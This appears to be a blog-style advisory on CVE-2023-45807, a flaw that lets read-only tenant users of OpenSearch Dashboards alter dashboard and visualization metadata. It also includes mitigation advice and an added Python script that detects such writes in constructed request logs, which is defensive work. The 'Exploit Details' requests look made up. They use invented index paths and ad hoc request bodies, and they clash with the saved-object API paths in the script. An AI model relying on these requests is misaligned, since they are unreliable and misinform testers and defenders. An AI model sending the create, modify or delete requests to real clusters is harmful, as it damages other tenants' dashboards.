OpenSearch is a community-driven, open source fork of Elasticsearch and Kibana that was created following the license change in early 2021. A security issue has been discovered in the implementation of tenant permissions in OpenSearch Dashboards. This vulnerability allows authenticated users with read-only access to a tenant to perform create, edit, and delete operations on index metadata of dashboards and visualizations in that tenant, which could potentially render them unavailable. This issue does not affect index data, only metadata, and users do not gain read access to any data beyond what their permissions already allow.

Exploit Details

The issue occurs due to improper enforcement of tenant permissions. By leveraging this vulnerability, attackers who have read-only access to the affected tenant can manipulate index metadata of dashboards and visualizations, causing disruptions in their functionality.

An example of how the vulnerability could be exploited can be seen in this code snippet:

# User with read-only access to a tenant
GET /_search
{
  "tenant": "restricted-tenant",
  "index": "dashboard-metadata-*",
  "type": "metadata",
  "query": {
    "match": {
      "metadata.owner": "attacker"
    }
  }
}

An attacker with read-only access can craft a request to perform unauthorized operations on the index metadata of dashboards, such as creating a new visualization, modifying an existing one, or deleting a visualization, as shown below:

# Creating a new visualization
PUT /dashboard-metadata-my-new-visualization
{
  "metadata": {
    "owner": "attacker",
    "type": "visualization",
    "created": "<timestamp>",
    "description": "New visualization created by exploiting CVE-2023-45807"
  }
}

# Modifying an existing visualization
POST /dashboard-metadata-existing-visualization
{
  "metadata": {
    "owner": "attacker",
    "type": "visualization",
    "modified": "<timestamp>",
    "description": "Modified existing visualization using CVE-2023-45807"
  }
}

# Deleting a visualization
DELETE /dashboard-metadata-existing-visualization

Mitigation

To mitigate this vulnerability, one can simply disable the tenants' functionality for the cluster. Additionally, OpenSearch has already released versions 1.3.14 and 2.11., which contain a fix for this issue.
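To review whether read-only tenant users performed saved-object writes while a cluster was still unpatched, request records can be compared against the tenant permissions in the role definitions. The following is an added example, not code from the original page or from the OpenSearch project; the role names, users, tenants and the record format are constructed, and `fnmatch` stands in for the security plugin's tenant pattern matching as an assumption.

```python
import fnmatch

# Constructed roles, shaped like the tenant_permissions entries of a roles.yml.
ROLES = {
    "analyst_ro": [{"tenant_patterns": ["finance*"], "allowed_actions": ["kibana_all_read"]}],
    "dash_admin": [{"tenant_patterns": ["finance", "ops"], "allowed_actions": ["kibana_all_write"]}],
}
USER_ROLES = {"alice": ["analyst_ro"], "bob": ["dash_admin"], "carol": ["analyst_ro", "dash_admin"]}

# Constructed request records (hypothetical format, not the plugin's audit log schema).
EVENTS = [
    {"user": "alice", "tenant": "finance", "method": "GET", "path": "/api/saved_objects/_find"},
    {"user": "alice", "tenant": "finance", "method": "DELETE", "path": "/api/saved_objects/visualization/v1"},
    {"user": "bob", "tenant": "finance", "method": "PUT", "path": "/api/saved_objects/dashboard/d1"},
    {"user": "carol", "tenant": "ops", "method": "POST", "path": "/api/saved_objects/visualization"},
    {"user": "carol", "tenant": "finance-eu", "method": "PUT", "path": "/api/saved_objects/dashboard/d2"},
    {"user": "alice", "tenant": "finance", "method": "POST", "path": "/api/saved_objects/_bulk_get"},
]

# POST endpoints that only read saved objects and must not be counted as writes.
READ_ONLY_POST = {"_bulk_get", "_export"}


def tenant_access(user, tenant):
    """Return 'write', 'read' or None: the strongest permission the user's roles grant on the tenant."""
    best = None
    for role in USER_ROLES.get(user, []):
        for perm in ROLES.get(role, []):
            if any(fnmatch.fnmatchcase(tenant, p) for p in perm["tenant_patterns"]):
                if "kibana_all_write" in perm["allowed_actions"]:
                    return "write"
                if "kibana_all_read" in perm["allowed_actions"]:
                    best = "read"
    return best


def is_write(event):
    """True for create, edit and delete requests against saved objects."""
    if event["method"] in ("PUT", "DELETE"):
        return True
    return event["method"] == "POST" and event["path"].rsplit("/", 1)[-1] not in READ_ONLY_POST


def find_violations(events):
    """Saved-object writes issued by users whose permission on that tenant is read-only."""
    return [e for e in events if is_write(e) and tenant_access(e["user"], e["tenant"]) == "read"]


for hit in find_violations(EVENTS):
    print(hit["user"], hit["tenant"], hit["method"], hit["path"])
```

Any record this reports on a patched cluster should have been rejected, so a hit there points to a role mapping or version problem worth checking.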

1. OpenSearch: https://opensearch.org/
2. OpenSearch Dashboards: https://opensearch.org/docs/dashboards/index/
3. CVE-2023-45807: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45807
4. OpenSearch Versions with fix: https://github.com/opensearch-project/OpenSearch-Dashboards/releases/tag/1.3.14 and https://github.com/opensearch-project/OpenSearch-Dashboards/releases/tag/2.11.

Conclusion

The recent discovery of CVE-2023-45807 in OpenSearch Dashboards highlights the importance of continuously monitoring and evaluating security issues within open source projects. Properly enforcing tenant permissions prevents unauthorized users from causing disruptions and compromising the availability of critical dashboard components. Upgrading to the latest version of OpenSearch Dashboards or disabling the tenants' functionality mitigates this vulnerability and protects dashboard and visualization metadata from unauthorized changes.

Timeline

Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/20/2023 18:29:38 UTC